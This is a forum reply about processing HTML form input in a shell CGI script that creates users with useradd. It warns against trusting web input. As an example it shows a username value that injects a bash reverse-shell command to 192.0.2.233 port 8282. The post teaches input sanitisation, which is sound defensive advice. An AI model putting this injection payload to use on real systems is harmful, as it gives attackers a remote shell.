Quote:
Originally Posted by robertkwild
so thats a no then on doing it via html form
|
I'm rather sure you can do process form data via a shell script. I've done CGI scripts in shell before but they were much simpler and it was a long, long time ago. However, that's the kind of thing you really ought to turn to perl for.
The point that I see several trying to make, and I hope it drives home, is that you cannot and must not in any way trust the data that arrives in your script from the web server. You have to severely process it so that only ASCII is left, if anything. And even then, only a subset. can be allowed.
For example you don't want the following line
Code:
useradd -g $group -d $dir/$user -s /sbin/nologin $user
to ever be in a situation where someone can set
$user equal to "
budroe; bash -i >& /dev/tcp/192.0.2.233/8282 0>&1;" or anything else malicious.